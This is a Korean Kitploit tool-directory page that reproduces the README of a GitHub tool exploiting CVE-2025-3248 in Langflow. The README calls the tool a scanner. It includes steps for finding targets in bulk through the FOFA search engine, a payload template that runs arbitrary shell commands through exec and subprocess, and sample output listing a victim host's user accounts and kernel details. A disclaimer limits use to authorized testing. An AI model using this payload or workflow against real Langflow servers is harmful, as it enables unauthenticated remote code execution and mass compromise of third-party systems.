Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-3248 — Langflow 애플리케이션의 CVE-2025-3248 취약점 스캐너입니다. Langflow 애플리케이션에서 CVE-2025-3248 취약점을 스캔하는 도구입니다. | Kitploit
도구/GitHubGitHub/xuemian168/cve-2025-3248
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringCommand and Control
GitHubxuemian168/cve-2025-3248

CVE-2025-3248

Langflow 애플리케이션의 CVE-2025-3248 취약점 스캐너입니다. Langflow 애플리케이션에서 CVE-2025-3248 취약점을 스캔하는 도구입니다.

저장소 보기
1021년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

中文 | 영어

Langflow 취약점 스캐너

Langflow 애플리케이션의 CVE-2025-3248을 위한 취약점 스캐너입니다.

기능

  • FOFA를 사용하여 단일 대상 또는 여러 대상 스캔
  • 취약한 대상에서 시스템 명령 실행
  • 시스템 정보 검색
  • 사용자 정의 페이로드 지원
  • FOFA 스캐닝용 진행률 표시줄
  • 아름다운 CLI 인터페이스

설치

  1. 저장소 클론:
root@kitploit:~
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. 종속성 설치:
root@kitploit:~
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. 환경 파일 편집 (선택사항)
root@kitploit:~
# After you finish editing
mv .env.example .env

사용법

단일 대상 스캔

root@kitploit:~
python main.py -t https://target.com

FOFA API 사용

root@kitploit:~
python main.py --fofa-email [email protected] --fofa-key your_api_key

추가 옵션

  • -t, --target: 스캔할 대상 URL
  • --fofa-email: FOFA API 이메일
  • --fofa-key: FOFA API 키
  • --fofa-query: FOFA 검색 쿼리 (기본값: 'app="LOGSPACE-LangFlow"')
  • --country: 국가 코드로 결과 필터링 (예: CN, US)
  • --max-pages: 가져올 최대 FOFA 페이지 수 (기본값: 5)
  • --page-size: 페이지당 결과 수 (기본값: 100)
  • --timeout: 요청 시간 초과(초) (기본값: 10)
  • --no-verify: SSL 인증 비활성화
  • --threads: 동시 스캔을 위한 스레드 수 (기본값: 5)
  • -f, --file: 페이로드로 사용할 사용자 정의 Python 파일

사용자 정의 페이로드

Python 파일을 생성하여 사용자 정의 페이로드를 만들 수 있습니다:

root@kitploit:~
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

그런 다음 다음과 같이 사용합니다:

root@kitploit:~
python main.py -t https://target.com -f your_payload.py

출력 예제

root@kitploit:~
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
root@kitploit:~
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

면책 조항

⚠️ 면책 조항 이 도구는 합법적인 목적으로만 사용됩니다. 교육 목적, 내부 기업 보안 테스트 또는 승인된 환경에서의 사용을 위해 설계되었습니다. 승인되지 않은 시스템, 네트워크 또는 장치에서 이 도구를 사용하는 것은 엄격히 금지되며, 관련 법률 및 규정을 위반할 수 있습니다.

사용자는 자신의 행동에 대한 모든 법적 책임을 져야 합니다. 저자와 기여자는 이 도구의 부적절한 사용으로 인한 손실, 데이터 유출 또는 법적 결과에 대해 책임을 지지 않습니다.

⚠️ 불법 공격에 사용하지 마십시오. 승인되지 않은 시스템에서 이 도구를 배포하거나 실행하려고 시도하지 마십시오.

참고 자료

  • https://github.com/langflow-ai/langflow/releases/tag/1.3.0
  • https://github.com/langflow-ai/langflow/pull/6911
  • https://www.cve.org/cverecord?id=CVE-2025-3248

라이선스

MIT 라이선스

도구 다운로드